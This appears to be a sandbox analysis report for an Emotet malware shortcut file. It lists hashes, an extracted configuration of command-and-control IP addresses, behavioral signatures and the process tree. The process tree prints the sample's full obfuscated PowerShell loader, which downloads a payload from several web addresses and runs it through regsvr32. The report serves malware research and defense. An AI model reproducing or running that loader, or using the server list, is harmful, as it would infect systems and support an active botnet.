Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 23:37
Static task
static1
Behavioral task
behavioral1
Sample
444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf.lnk
Resource
win7-20241010-en
General
-
Target
444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf.lnk
-
Size
3KB
-
MD5
9d6cf11e83532493480dd167924d2165
-
SHA1
b83c252564e2cc4b1b17d9279fe42bf3cf6b6326
-
SHA256
444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf
-
SHA512
eb9b02ebc40b7de47cb72dc18b8685f3c64cb880b914ea5f90ab21fed543ec7769ada6ba11173b769f9fb23e9e29aa98499d932c9b7588d6bb5c72dae2d8351e
Malware Config
Extracted
emotet
Epoch4
149.56.131.28:8080
72.15.201.15:8080
207.148.79.14:8080
82.165.152.127:8080
46.55.222.11:443
213.241.20.155:443
163.44.196.120:8080
51.254.140.238:7080
107.170.39.149:8080
188.44.20.25:443
82.223.21.224:8080
172.104.251.154:8080
164.68.99.3:8080
101.50.0.91:8080
129.232.188.93:443
173.212.193.249:8080
103.132.242.26:8080
186.194.240.217:443
37.187.115.122:8080
91.207.28.33:8080
134.122.66.193:8080
1.234.2.232:8080
103.75.201.2:443
196.218.30.83:443
5.9.116.246:8080
103.70.28.102:8080
41.73.252.195:443
158.69.222.101:443
209.97.163.214:443
185.4.135.165:8080
115.68.227.76:8080
203.114.109.124:443
159.65.140.115:443
110.232.117.186:8080
51.91.76.89:8080
64.227.100.222:8080
150.95.66.124:8080
209.126.98.206:8080
153.126.146.25:7080
45.186.16.18:443
131.100.24.231:80
146.59.226.45:443
160.16.142.56:8080
167.172.253.162:8080
183.111.227.137:8080
119.193.124.41:7080
45.118.115.99:8080
159.89.202.34:443
51.161.73.194:443
212.24.98.99:8080
45.176.232.124:443
206.189.28.199:8080
197.242.150.244:8080
103.43.75.120:443
201.94.166.162:443
151.106.112.196:8080
157.245.196.132:443
159.65.88.10:8080
94.23.45.86:4143
79.137.35.198:8080
1.234.21.73:7080
45.235.8.30:8080
Signatures
-
Emotet family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 5036 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 1608 regsvr32.exe 3540 regsvr32.exe -
pid Process 5036 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 5036 powershell.exe 5036 powershell.exe 1608 regsvr32.exe 1608 regsvr32.exe 3540 regsvr32.exe 3540 regsvr32.exe 3540 regsvr32.exe 3540 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5036 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1424 wrote to memory of 5036 1424 cmd.exe 84 PID 1424 wrote to memory of 5036 1424 cmd.exe 84 PID 5036 wrote to memory of 1608 5036 powershell.exe 92 PID 5036 wrote to memory of 1608 5036 powershell.exe 92 PID 1608 wrote to memory of 3540 1608 regsvr32.exe 93 PID 1608 wrote to memory of 3540 1608 regsvr32.exe 93
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\444afb61279aaf25f8166d9f23b9c56efb277cbe43dbbccef9f55407809842bf.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "&{'ZZvPNSKeK+IuicWBL99TDQVa5lqEmN8IplPY0QcqwUAWg3Kb+66Pjv+f2Sj4d/snwI1Cv4na';$jf='ICAgV3JpdGUtSG9zdCAiT1JqeXEiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oIm';$YFtXtU='h0dHA6Ly93d3cubmFrbGFmc2h0YWJ1ay5jb20vd3AtY29udGVudC9zRVhFWjlFYm1NNlRPRS8iLCJodHRwOi8vam9iY2l0eS5jb20vaW1nL1JNMFhwWC8iLCJodHRwczovL2JvbGVvLm5sL2Nvbm5lY3RvcnMvNjZQR09ERTFIaGF5NGUvIiwiaHR0cDovL3dpbmRzdXJmaW5ndGhhaWxhbmQub3JnL2FkbWluLzNoanltUlBlNGNSNGgvIiwiaHR0cDovL3d3dy52YWx5dmFsLmNvbS9wdW4vaFQvIiwiaHR0cDovL3dpdGh2YWMwMDEuZG90aG9tZS5jby5rci9hc3NldDMvc0xuRms4aUZVd1BBaTFtQWZRLyIpOyR0PSJaUHZaUG9EIjskZD0iJGVudjpUTVBcLi5cJHQiO21rZGlyIC1mb3JjZSAkZCB8IG91dC1udWxsO2ZvcmVhY2ggKCR1IGluICRsaW5rcykge3RyeSB7SVdSICR1IC1PdXRGaWxlICRkXGtCYk52emhKSXMud0pwO1JlZ3N2cjMyLmV4ZSAiJGRca0JiTnZ6aEpJcy53SnAiO2JyZWFrfSBjYXRjaCB7IH19';$rNJrM=$jf+$YFtXtU;$bIcdbg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($rNJrM));$rNJrM=$bIcdbg;iex($rNJrM)}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\ZPvZPoD\kBbNvzhJIs.wJp3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\OCxFEYrXIe\uffLQiatbd.dll"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3540
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
822KB
MD54a659a5e48556eb45b4f05ecede16671
SHA1135d7bf7ca4d37887892a0c272ca549602cc5145
SHA25615e9869fff87b5456e40358c52007c9e3f7dbfbe9096aea8c2712e65deb65a5b
SHA5120e5c1e3055071de09031021688492133f9928462a5a5cc8d8793ee3b542e774399dbac6dd8c81eaf307ca8ce30260537d8eb7bceb824fab29a75d797ac131864